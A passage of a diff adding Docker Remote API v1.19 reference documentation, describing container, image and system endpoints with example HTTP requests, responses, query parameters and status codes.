"/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/resolv.conf", + "RestartCount": 1, + "State": { + "Error": "", + "ExitCode": 9, + "FinishedAt": "2015-01-06T15:47:32.080254511Z", + "OOMKilled": false, + "Paused": false, + "Pid": 0, + "Restarting": false, + "Running": true, + "StartedAt": "2015-01-06T15:47:32.072697474Z" + }, + "Volumes": {}, + "VolumesRW": {} + } + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### List processes running inside a container + +`GET /containers/(id or name)/top` + +List processes running inside the container `id`. On Unix systems this +is done by running the `ps` command. This endpoint is not +supported on Windows. + +**Example request**: + + GET /v1.19/containers/4fa6e0f0c678/top HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Titles" : [ + "UID", "PID", "PPID", "C", "STIME", "TTY", "TIME", "CMD" + ], + "Processes" : [ + [ + "root", "13642", "882", "0", "17:03", "pts/0", "00:00:00", "/bin/bash" + ], + [ + "root", "13735", "13642", "0", "17:06", "pts/0", "00:00:00", "sleep 10" + ] + ] + } + +**Example request**: + + GET /v1.19/containers/4fa6e0f0c678/top?ps_args=aux HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Titles" : [ + "USER","PID","%CPU","%MEM","VSZ","RSS","TTY","STAT","START","TIME","COMMAND" + ] + "Processes" : [ + [ + "root","13642","0.0","0.1","18172","3184","pts/0","Ss","17:03","0:00","/bin/bash" + ], + [ + "root","13895","0.0","0.0","4348","692","pts/0","S+","17:15","0:00","sleep 10" + ] + ], + } + +**Query parameters**: + +- **ps_args** – `ps` arguments to use (e.g., `aux`), defaults to `-ef` + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Get container logs + +`GET /containers/(id or name)/logs` + +Get `stdout` and `stderr` logs from the container ``id`` + +> **Note**: +> This endpoint works only for containers with the `json-file` or `journald` logging drivers. + +**Example request**: + + GET /v1.19/containers/4fa6e0f0c678/logs?stderr=1&stdout=1×tamps=1&follow=1&tail=10&since=1428990821 HTTP/1.1 + +**Example response**: + + HTTP/1.1 101 UPGRADED + Content-Type: application/vnd.docker.raw-stream + Connection: Upgrade + Upgrade: tcp + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **follow** – 1/True/true or 0/False/false, return stream. Default `false`. +- **stdout** – 1/True/true or 0/False/false, show `stdout` log. Default `false`. +- **stderr** – 1/True/true or 0/False/false, show `stderr` log. Default `false`. +- **since** – UNIX timestamp (integer) to filter logs. Specifying a timestamp + will only output log-entries since that timestamp. Default: 0 (unfiltered) +- **timestamps** – 1/True/true or 0/False/false, print timestamps for + every log line. Default `false`. +- **tail** – Output specified number of lines at the end of logs: `all` or ``. Default all. + +**Status codes**: + +- **101** – no error, hints proxy about hijacking +- **200** – no error, no upgrade header found +- **404** – no such container +- **500** – server error + +#### Inspect changes on a container's filesystem + +`GET /containers/(id or name)/changes` + +Inspect changes on container `id`'s filesystem + +**Example request**: + + GET /v1.19/containers/4fa6e0f0c678/changes HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Path": "/dev", + "Kind": 0 + }, + { + "Path": "/dev/kmsg", + "Kind": 1 + }, + { + "Path": "/test", + "Kind": 1 + } + ] + +Values for `Kind`: + +- `0`: Modify +- `1`: Add +- `2`: Delete + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Export a container + +`GET /containers/(id or name)/export` + +Export the contents of container `id` + +**Example request**: + + GET /v1.19/containers/4fa6e0f0c678/export HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/octet-stream + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Get container stats based on resource usage + +`GET /containers/(id or name)/stats` + +This endpoint returns a live stream of a container's resource usage statistics. + +**Example request**: + + GET /v1.19/containers/redis1/stats HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "read" : "2015-01-08T22:57:31.547920715Z", + "network" : { + "rx_dropped" : 0, + "rx_bytes" : 648, + "rx_errors" : 0, + "tx_packets" : 8, + "tx_dropped" : 0, + "rx_packets" : 8, + "tx_errors" : 0, + "tx_bytes" : 648 + }, + "memory_stats" : { + "stats" : { + "total_pgmajfault" : 0, + "cache" : 0, + "mapped_file" : 0, + "total_inactive_file" : 0, + "pgpgout" : 414, + "rss" : 6537216, + "total_mapped_file" : 0, + "writeback" : 0, + "unevictable" : 0, + "pgpgin" : 477, + "total_unevictable" : 0, + "pgmajfault" : 0, + "total_rss" : 6537216, + "total_rss_huge" : 6291456, + "total_writeback" : 0, + "total_inactive_anon" : 0, + "rss_huge" : 6291456, + "hierarchical_memory_limit" : 67108864, + "total_pgfault" : 964, + "total_active_file" : 0, + "active_anon" : 6537216, + "total_active_anon" : 6537216, + "total_pgpgout" : 414, + "total_cache" : 0, + "inactive_anon" : 0, + "active_file" : 0, + "pgfault" : 964, + "inactive_file" : 0, + "total_pgpgin" : 477 + }, + "max_usage" : 6651904, + "usage" : 6537216, + "failcnt" : 0, + "limit" : 67108864 + }, + "blkio_stats" : {}, + "cpu_stats" : { + "cpu_usage" : { + "percpu_usage" : [ + 8646879, + 24472255, + 36438778, + 30657443 + ], + "usage_in_usermode" : 50000000, + "total_usage" : 100215355, + "usage_in_kernelmode" : 30000000 + }, + "system_cpu_usage" : 739306590000000, + "throttling_data" : {"periods":0,"throttled_periods":0,"throttled_time":0} + }, + "precpu_stats" : { + "cpu_usage" : { + "percpu_usage" : [ + 8646879, + 24350896, + 36438778, + 30657443 + ], + "usage_in_usermode" : 50000000, + "total_usage" : 100093996, + "usage_in_kernelmode" : 30000000 + }, + "system_cpu_usage" : 9492140000000, + "throttling_data" : {"periods":0,"throttled_periods":0,"throttled_time":0} + } + } + +The precpu_stats is the cpu statistic of last read, which is used for calculating the cpu usage percent. It is not the exact copy of the “cpu_stats” field. + +**Query parameters**: + +- **stream** – 1/True/true or 0/False/false, pull stats once then disconnect. Default `true`. + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Resize a container TTY + +`POST /containers/(id or name)/resize?h=&w=` + +Resize the TTY for container with `id`. You must restart the container for the resize to take effect. + +**Example request**: + + POST /v1.19/containers/4fa6e0f0c678/resize?h=40&w=80 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Length: 0 + Content-Type: text/plain; charset=utf-8 + +**Query parameters**: + +- **h** – height of `tty` session +- **w** – width + +**Status codes**: + +- **200** – no error +- **404** – No such container +- **500** – Cannot resize container + +#### Start a container + +`POST /containers/(id or name)/start` + +Start the container `id` + +> **Note**: +> For backwards compatibility, this endpoint accepts a `HostConfig` as JSON-encoded request body. +> See [create a container](#create-a-container) for details. + +**Example request**: + + POST /v1.19/containers/e90e34656806/start HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** – no error +- **304** – container already started +- **404** – no such container +- **500** – server error + +#### Stop a container + +`POST /containers/(id or name)/stop` + +Stop the container `id` + +**Example request**: + + POST /v1.19/containers/e90e34656806/stop?t=5 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **t** – number of seconds to wait before killing the container + +**Status codes**: + +- **204** – no error +- **304** – container already stopped +- **404** – no such container +- **500** – server error + +#### Restart a container + +`POST /containers/(id or name)/restart` + +Restart the container `id` + +**Example request**: + + POST /v1.19/containers/e90e34656806/restart?t=5 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **t** – number of seconds to wait before killing the container + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Kill a container + +`POST /containers/(id or name)/kill` + +Kill the container `id` + +**Example request**: + + POST /v1.19/containers/e90e34656806/kill HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **signal** - Signal to send to the container: integer or string like `SIGINT`. + When not set, `SIGKILL` is assumed and the call waits for the container to exit. + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Rename a container + +`POST /containers/(id or name)/rename` + +Rename the container `id` to a `new_name` + +**Example request**: + + POST /v1.19/containers/e90e34656806/rename?name=new_name HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **name** – new name for the container + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **409** - conflict name already assigned +- **500** – server error + +#### Pause a container + +`POST /containers/(id or name)/pause` + +Pause the container `id` + +**Example request**: + + POST /v1.19/containers/e90e34656806/pause HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Unpause a container + +`POST /containers/(id or name)/unpause` + +Unpause the container `id` + +**Example request**: + + POST /v1.19/containers/e90e34656806/unpause HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Attach to a container + +`POST /containers/(id or name)/attach` + +Attach to the container `id` + +**Example request**: + + POST /v1.19/containers/16253994b7c4/attach?logs=1&stream=0&stdout=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 101 UPGRADED + Content-Type: application/vnd.docker.raw-stream + Connection: Upgrade + Upgrade: tcp + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **logs** – 1/True/true or 0/False/false, return logs. Default `false`. +- **stream** – 1/True/true or 0/False/false, return stream. + Default `false`. +- **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach + to `stdin`. Default `false`. +- **stdout** – 1/True/true or 0/False/false, if `logs=true`, return + `stdout` log, if `stream=true`, attach to `stdout`. Default `false`. +- **stderr** – 1/True/true or 0/False/false, if `logs=true`, return + `stderr` log, if `stream=true`, attach to `stderr`. Default `false`. + +**Status codes**: + +- **101** – no error, hints proxy about hijacking +- **200** – no error, no upgrade header found +- **400** – bad parameter +- **404** – no such container +- **500** – server error + +**Stream details**: + +When using the TTY setting is enabled in +[`POST /containers/create` +](#create-a-container), +the stream is the raw data from the process PTY and client's `stdin`. +When the TTY is disabled, then the stream is multiplexed to separate +`stdout` and `stderr`. + +The format is a **Header** and a **Payload** (frame). + +**HEADER** + +The header contains the information which the stream writes (`stdout` or +`stderr`). It also contains the size of the associated frame encoded in the +last four bytes (`uint32`). + +It is encoded on the first eight bytes like this: + + header := [8]byte{STREAM_TYPE, 0, 0, 0, SIZE1, SIZE2, SIZE3, SIZE4} + +`STREAM_TYPE` can be: + +- 0: `stdin` (is written on `stdout`) +- 1: `stdout` +- 2: `stderr` + +`SIZE1, SIZE2, SIZE3, SIZE4` are the four bytes of +the `uint32` size encoded as big endian. + +**PAYLOAD** + +The payload is the raw stream. + +**IMPLEMENTATION** + +The simplest way to implement the Attach protocol is the following: + + 1. Read eight bytes. + 2. Choose `stdout` or `stderr` depending on the first byte. + 3. Extract the frame size from the last four bytes. + 4. Read the extracted size and output it on the correct output. + 5. Goto 1. + +#### Attach to a container (websocket) + +`GET /containers/(id or name)/attach/ws` + +Attach to the container `id` via websocket + +Implements websocket protocol handshake according to [RFC 6455](http://tools.ietf.org/html/rfc6455) + +**Example request** + + GET /v1.19/containers/e90e34656806/attach/ws?logs=0&stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1 + +**Example response** + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **logs** – 1/True/true or 0/False/false, return logs. Default `false`. +- **stream** – 1/True/true or 0/False/false, return stream. + Default `false`. +- **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach + to `stdin`. Default `false`. +- **stdout** – 1/True/true or 0/False/false, if `logs=true`, return + `stdout` log, if `stream=true`, attach to `stdout`. Default `false`. +- **stderr** – 1/True/true or 0/False/false, if `logs=true`, return + `stderr` log, if `stream=true`, attach to `stderr`. Default `false`. + +**Status codes**: + +- **200** – no error +- **400** – bad parameter +- **404** – no such container +- **500** – server error + +#### Wait a container + +`POST /containers/(id or name)/wait` + +Block until container `id` stops, then returns the exit code + +**Example request**: + + POST /v1.19/containers/16253994b7c4/wait HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"StatusCode": 0} + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Remove a container + +`DELETE /containers/(id or name)` + +Remove the container `id` from the filesystem + +**Example request**: + + DELETE /v1.19/containers/16253994b7c4?v=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **v** – 1/True/true or 0/False/false, Remove the volumes + associated to the container. Default `false`. +- **force** - 1/True/true or 0/False/false, Kill then remove the container. + Default `false`. + +**Status codes**: + +- **204** – no error +- **400** – bad parameter +- **404** – no such container +- **409** – conflict +- **500** – server error + +#### Copy files or folders from a container + +`POST /containers/(id or name)/copy` + +Copy files or folders of container `id` + +**Example request**: + + POST /v1.19/containers/4fa6e0f0c678/copy HTTP/1.1 + Content-Type: application/json + + { + "Resource": "test.txt" + } + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +### 2.2 Images + +#### List Images + +`GET /images/json` + +**Example request**: + + GET /v1.19/images/json?all=0 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "RepoTags": [ + "ubuntu:12.04", + "ubuntu:precise", + "ubuntu:latest" + ], + "Id": "8dbd9e392a964056420e5d58ca5cc376ef18e2de93b5cc90e868a1bbc8318c1c", + "Created": 1365714795, + "Size": 131506275, + "VirtualSize": 131506275, + "Labels": {} + }, + { + "RepoTags": [ + "ubuntu:12.10", + "ubuntu:quantal" + ], + "ParentId": "27cf784147099545", + "Id": "b750fe79269d2ec9a3c593ef05b4332b1d1a02a62b4accb2c21d589ff2f5f2dc", + "Created": 1364102658, + "Size": 24653, + "VirtualSize": 180116135, + "Labels": { + "com.example.version": "v1" + } + } + ] + +**Example request, with digest information**: + + GET /v1.19/images/json?digests=1 HTTP/1.1 + +**Example response, with digest information**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Created": 1420064636, + "Id": "4986bf8c15363d1c5d15512d5266f8777bfba4974ac56e3270e7760f6f0a8125", + "ParentId": "ea13149945cb6b1e746bf28032f02e9b5a793523481a0a18645fc77ad53c4ea2", + "RepoDigests": [ + "localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf" + ], + "RepoTags": [ + "localhost:5000/test/busybox:latest", + "playdate:latest" + ], + "Size": 0, + "VirtualSize": 2429728, + "Labels": {} + } + ] + +The response shows a single image `Id` associated with two repositories +(`RepoTags`): `localhost:5000/test/busybox`: and `playdate`. A caller can use +either of the `RepoTags` values `localhost:5000/test/busybox:latest` or +`playdate:latest` to reference the image. + +You can also use `RepoDigests` values to reference an image. In this response, +the array has only one reference and that is to the +`localhost:5000/test/busybox` repository; the `playdate` repository has no +digest. You can reference this digest using the value: +`localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d...` + +See the `docker run` and `docker build` commands for examples of digest and tag +references on the command line. + +**Query parameters**: + +- **all** – 1/True/true or 0/False/false, default false +- **filters** – a JSON encoded value of the filters (a map[string][]string) to process on the images list. Available filters: + - `dangling=true` + - `label=key` or `label="key=value"` of an image label +- **filter** - only return images with the specified name + +#### Build image from a Dockerfile + +`POST /build` + +Build an image from a Dockerfile + +**Example request**: + + POST /v1.19/build HTTP/1.1 + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"stream": "Step 1/5..."} + {"stream": "..."} + {"error": "Error...", "errorDetail": {"code": 123, "message": "Error..."}} + +The input stream must be a `tar` archive compressed with one of the +following algorithms: `identity` (no compression), `gzip`, `bzip2`, `xz`. + +The archive must include a build instructions file, typically called +`Dockerfile` at the archive's root. The `dockerfile` parameter may be +used to specify a different build instructions file. To do this, its value must be +the path to the alternate build instructions file to use. + +The archive may include any number of other files, +which are accessible in the build context (See the [*ADD build +command*](../reference/builder.md#add)). + +The Docker daemon performs a preliminary validation of the `Dockerfile` before +starting the build, and returns an error if the syntax is incorrect. After that, +each instruction is run one-by-one until the ID of the new image is output. + +The build is canceled if the client drops the connection by quitting +or being killed. + +**Query parameters**: + +- **dockerfile** - Path within the build context to the Dockerfile. This is + ignored if `remote` is specified and points to an individual filename. +- **t** – A name and optional tag to apply to the image in the `name:tag` format. + If you omit the `tag` the default `latest` value is assumed. +- **remote** – A Git repository URI or HTTP/HTTPS URI build source. If the + URI specifies a filename, the file's contents are placed into a file + called `Dockerfile`. +- **q** – Suppress verbose build output. +- **nocache** – Do not use the cache when building the image. +- **pull** - Attempt to pull the image even if an older image exists locally. +- **rm** - Remove intermediate containers after a successful build (default behavior). +- **forcerm** - Always remove intermediate containers (includes `rm`). +- **memory** - Set memory limit for build. +- **memswap** - Total memory (memory + swap), `-1` to enable unlimited swap. +- **cpushares** - CPU shares (relative weight). +- **cpusetcpus** - CPUs in which to allow execution (e.g., `0-3`, `0,1`). +- **cpuperiod** - The length of a CPU period in microseconds. +- **cpuquota** - Microseconds of CPU time that the container can get in a CPU period. + +**Request Headers**: + +- **Content-type** – Set to `"application/tar"`. +- **X-Registry-Config** – base64-encoded ConfigFile object + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Create an image + +`POST /images/create` + +Create an image either by pulling it from the registry or by importing it + +**Example request**: + + POST /v1.19/images/create?fromImage=busybox&tag=latest HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"status": "Pulling..."} + {"status": "Pulling", "progress": "1 B/ 100 B", "progressDetail": {"current": 1, "total": 100}} + {"error": "Invalid..."} + ... + +When using this endpoint to pull an image from the registry, the +`X-Registry-Auth` header can be used to include +a base64-encoded AuthConfig object. + +**Query parameters**: + +- **fromImage** – Name of the image to pull. +- **fromSrc** – Source to import. The value may be a URL from which the image + can be retrieved or `-` to read the image from the request body. +- **repo** – Repository name. +- **tag** – Tag. If empty when pulling an image, this causes all tags + for the given image to be pulled. + +**Request Headers**: + +- **X-Registry-Auth** – base64-encoded AuthConfig object + +**Status codes**: + +- **200** – no error +- **404** - repository does not exist or no read access +- **500** – server error + + + +#### Inspect an image + +`GET /images/(name)/json` + +Return low-level information on the image `name` + +**Example request**: + + GET /v1.19/images/ubuntu/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Created": "2013-03-23T22:24:18.818426-07:00", + "Container": "3d67245a8d72ecf13f33dffac9f79dcdf70f75acb84d308770391510e0c23ad0", + "ContainerConfig": { + "Hostname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": false, + "AttachStderr": false, + "Tty": true, + "OpenStdin": true, + "StdinOnce": false, + "Env": null, + "Cmd": ["/bin/bash"], + "Dns": null, + "Image": "ubuntu", + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "Volumes": null, + "VolumesFrom": "", + "WorkingDir": "" + }, + "Id": "b750fe79269d2ec9a3c593ef05b4332b1d1a02a62b4accb2c21d589ff2f5f2dc", + "Parent": "27cf784147099545", + "Size": 6824592 + } + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **500** – server error + +#### Get the history of an image + +`GET /images/(name)/history` + +Return the history of the image `name` + +**Example request**: + + GET /v1.19/images/ubuntu/history HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Id": "3db9c44f45209632d6050b35958829c3a2aa256d81b9a7be45b362ff85c54710", + "Created": 1398108230, + "CreatedBy": "/bin/sh -c #(nop) ADD file:eb15dbd63394e063b805a3c32ca7bf0266ef64676d5a6fab4801f2e81e2a5148 in /", + "Tags": [ + "ubuntu:lucid", + "ubuntu:10.04" + ], + "Size": 182964289, + "Comment": "" + }, + { + "Id": "6cfa4d1f33fb861d4d114f43b25abd0ac737509268065cdfd69d544a59c85ab8", + "Created": 1398108222, + "CreatedBy": "/bin/sh -c #(nop) MAINTAINER Tianon Gravi - mkimage-debootstrap.sh -i iproute,iputils-ping,ubuntu-minimal -t lucid.tar.xz lucid http://archive.ubuntu.com/ubuntu/", + "Tags": null, + "Size": 0, + "Comment": "" + }, + { + "Id": "511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158", + "Created": 1371157430, + "CreatedBy": "", + "Tags": [ + "scratch12:latest", + "scratch:latest" + ], + "Size": 0, + "Comment": "Imported from -" + } + ] + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **500** – server error + +#### Push an image on the registry + +`POST /images/(name)/push` + +Push the image `name` on the registry + +**Example request**: + + POST /v1.19/images/test/push HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"status": "Pushing..."} + {"status": "Pushing", "progress": "1/? (n/a)", "progressDetail": {"current": 1}}} + {"error": "Invalid..."} + ... + +If you wish to push an image on to a private registry, that image must already have a tag +into a repository which references that registry `hostname` and `port`. This repository name should +then be used in the URL. This duplicates the command line's flow. + +**Example request**: + + POST /v1.19/images/registry.acme.com:5000/test/push HTTP/1.1 + + +**Query parameters**: + +- **tag** – The tag to associate with the image on the registry. This is optional. + +**Request Headers**: + +- **X-Registry-Auth** – base64-encoded AuthConfig object. + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **500** – server error + +#### Tag an image into a repository + +`POST /images/(name)/tag` + +Tag the image `name` into a repository + +**Example request**: + + POST /v1.19/images/test/tag?repo=myrepo&force=0&tag=v42 HTTP/1.1 + +**Example response**: + + HTTP/1.1 201 Created + +**Query parameters**: + +- **repo** – The repository to tag in +- **force** – 1/True/true or 0/False/false, default false +- **tag** - The new tag name + +**Status codes**: + +- **201** – no error +- **400** – bad parameter +- **404** – no such image +- **409** – conflict +- **500** – server error + +#### Remove an image + +`DELETE /images/(name)` + +Remove the image `name` from the filesystem + +**Example request**: + + DELETE /v1.19/images/test HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-type: application/json + + [ + {"Untagged": "3e2f21a89f"}, + {"Deleted": "3e2f21a89f"}, + {"Deleted": "53b4f83ac9"} + ] + +**Query parameters**: + +- **force** – 1/True/true or 0/False/false, default false +- **noprune** – 1/True/true or 0/False/false, default false + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **409** – conflict +- **500** – server error + +#### Search images + +`GET /images/search` + +Search for an image on [Docker Hub](https://hub.docker.com). This API +returns both `is_trusted` and `is_automated` images. Currently, they +are considered identical. In the future, the `is_trusted` property will +be deprecated and replaced by the `is_automated` property. + +> **Note**: +> The response keys have changed from API v1.6 to reflect the JSON +> sent by the registry server to the docker daemon's request. + +**Example request**: + + GET /v1.19/images/search?term=sshd HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "star_count": 12, + "is_official": false, + "name": "wma55/u1210sshd", + "is_trusted": false, + "is_automated": false, + "description": "" + }, + { + "star_count": 10, + "is_official": false, + "name": "jdswinbank/sshd", + "is_trusted": false, + "is_automated": false, + "description": "" + }, + { + "star_count": 18, + "is_official": false, + "name": "vgauthier/sshd", + "is_trusted": false, + "is_automated": false, + "description": "" + } + ... + ] + +**Query parameters**: + +- **term** – term to search + +**Status codes**: + +- **200** – no error +- **500** – server error + +### 2.3 Misc + +#### Check auth configuration + +`POST /auth` + +Get the default username and email + +**Example request**: + + POST /v1.19/auth HTTP/1.1 + Content-Type: application/json + + { + "username": "hannibal", + "password": "xxxx", + "email": "hannibal@a-team.com", + "serveraddress": "https://index.docker.io/v1/" + } + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** – no error +- **204** – no error +- **500** – server error + +#### Display system-wide information + +`GET /info` + +Display system-wide information + +**Example request**: + + GET /v1.19/info HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Containers": 11, + "CpuCfsPeriod": true, + "CpuCfsQuota": true, + "Debug": false, + "DockerRootDir": "/var/lib/docker", + "Driver": "btrfs", + "DriverStatus": [[""]], + "ExecutionDriver": "native-0.1", + "ExperimentalBuild": false, + "HttpProxy": "http://test:test@localhost:8080", + "HttpsProxy": "https://test:test@localhost:8080", + "ID": "7TRN:IPZB:QYBB:VPBQ:UMPP:KARE:6ZNR:XE6T:7EWV:PKF4:ZOJD:TPYS", + "IPv4Forwarding": true, + "Images": 16, + "IndexServerAddress": "https://index.docker.io/v1/", + "InitPath": "/usr/bin/docker", + "InitSha1": "", + "KernelVersion": "3.12.0-1-amd64", + "Labels": [ + "storage=ssd" + ], + "MemTotal": 2099236864, + "MemoryLimit": true, + "NCPU": 1, + "NEventsListener": 0, + "NFd": 11, + "NGoroutines": 21, + "Name": "prod-server-42", + "NoProxy": "9.81.1.160", + "OomKillDisable": true, + "OperatingSystem": "Boot2Docker", + "RegistryConfig": { + "IndexConfigs": { + "docker.io": { + "Mirrors": null, + "Name": "docker.io", + "Official": true, + "Secure": true + } + }, + "InsecureRegistryCIDRs": [ + "127.0.0.0/8" + ] + }, + "SwapLimit": false, + "SystemTime": "2015-03-10T11:11:23.730591467-07:00" + } + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Show the docker version information + +`GET /version` + +Show the docker version information + +**Example request**: + + GET /v1.19/version HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Version": "1.5.0", + "Os": "linux", + "KernelVersion": "3.18.5-tinycore64", + "GoVersion": "go1.4.1", + "GitCommit": "a8a31ef", + "Arch": "amd64", + "ApiVersion": "1.19" + } + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Ping the docker server + +`GET /_ping` + +Ping the docker server + +**Example request**: + + GET /v1.19/_ping HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: text/plain + + OK + +**Status codes**: + +- **200** - no error +- **500** - server error + +#### Create a new image from a container's changes + +`POST /commit` + +Create a new image from a container's changes + +**Example request**: + + POST /v1.19/commit?container=44c004db4b17&comment=message&repo=myrepo HTTP/1.1 + Content-Type: application/json + + { + "Hostname": "", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": true, + "AttachStderr": true, + "PortSpecs": null, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": null, + "Cmd": [ + "date" + ], + "Volumes": { + "/tmp": {} + }, + "Labels": { + "key1": "value1", + "key2": "value2" + }, + "WorkingDir": "", + "NetworkDisabled": false, + "ExposedPorts": { + "22/tcp": {} + } + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + {"Id": "596069db4bf5"} + +**JSON parameters**: + +- **config** - the container's configuration + +**Query parameters**: + +- **container** – source container +- **repo** – repository +- **tag** – tag +- **comment** – commit message +- **author** – author (e.g., "John Hannibal Smith + <[hannibal@a-team.com](mailto:hannibal%40a-team.com)>") + +**Status codes**: + +- **201** – no error +- **404** – no such container +- **500** – server error + +#### Monitor Docker's events + +`GET /events` + +Get container events from docker, in real time via streaming. + +Docker containers report the following events: + + attach, commit, copy, create, destroy, die, exec_create, exec_start, export, kill, oom, pause, rename, resize, restart, start, stop, top, unpause + +Docker images report the following events: + + untag, delete + +**Example request**: + + GET /v1.19/events?since=1374067924 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"status": "create", "id": "dfdf82bd3881","from": "ubuntu:latest", "time":1374067924} + {"status": "start", "id": "dfdf82bd3881","from": "ubuntu:latest", "time":1374067924} + {"status": "stop", "id": "dfdf82bd3881","from": "ubuntu:latest", "time":1374067966} + {"status": "destroy", "id": "dfdf82bd3881","from": "ubuntu:latest", "time":1374067970} + +**Query parameters**: + +- **since** – Timestamp. Show all events created since timestamp and then stream +- **until** – Timestamp. Show events created until given timestamp and stop streaming +- **filters** – A json encoded value of the filters (a map[string][]string) to process on the event list. Available filters: + - `container=`; -- container to filter + - `event=`; -- event to filter + - `image=`; -- image to filter + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Get a tarball containing all images in a repository + +`GET /images/(name)/get` + +Get a tarball containing all images and metadata for the repository specified +by `name`. + +If `name` is a specific name and tag (e.g. ubuntu:latest), then only that image +(and its parents) are returned. If `name` is an image ID, similarly only that +image (and its parents) are returned, but with the exclusion of the +'repositories' file in the tarball, as there were no image names referenced. + +See the [image tarball format](#image-tarball-format) for more details. + +**Example request** + + GET /v1.19/images/ubuntu/get + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + + Binary data stream + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Get a tarball containing all images + +`GET /images/get` + +Get a tarball containing all images and metadata for one or more repositories. + +For each value of the `names` parameter: if it is a specific name and tag (e.g. +`ubuntu:latest`), then only that image (and its parents) are returned; if it is +an image ID, similarly only that image (and its parents) are returned and there +would be no names referenced in the 'repositories' file for this image ID. + +See the [image tarball format](#image-tarball-format) for more details. + +**Example request** + + GET /v1.19/images/get?names=myname%2Fmyapp%3Alatest&names=busybox + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + + Binary data stream + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Load a tarball with a set of images and tags into docker + +`POST /images/load` + +Load a set of images and tags into a Docker repository. +See the [image tarball format](#image-tarball-format) for more details. + +**Example request** + + POST /v1.19/images/load + Content-Type: application/x-tar + + Tarball in body + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** 